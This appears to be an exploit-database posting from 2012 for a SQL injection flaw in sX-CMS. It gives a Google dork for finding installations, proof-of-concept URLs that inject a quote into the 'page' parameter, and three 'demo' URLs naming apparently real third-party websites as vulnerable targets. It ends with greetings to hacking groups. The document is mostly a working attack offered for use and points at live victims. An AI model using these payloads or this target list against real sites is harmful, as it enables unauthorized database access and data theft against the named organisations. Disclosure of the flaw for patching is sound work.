sX-CMS suffers from a remote SQL injection vulnerability.
f67ebb0b331c2c6965fe80893a34500c3556e608a07b6135ee452f6ddbb64471##################################################
# Exploit Title: sX-CMS <= SQL injection Vulnerability
# Date: 06/04/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://www.source-worx.de/
# Google dork: powered by sX-CMS
# Tested on: Linux
##################################################
[~]Exploit/p0c :
http://localhost:80/cms/index/page/_9'
http://localhost:80/cms/index.php?page='9
[~]Dem0 :
http://www.general-aero.com/cms/cms/index/page/_9'
http://www.naturel-europe.de/cms/index/page/_9'
http://www.cycletec.de/cms/index.php?page=-9'
FB : www.fb.me/justryuz
+---------------------------------------------------+
Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+
CyberSEC © 2012 All rights reserved.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed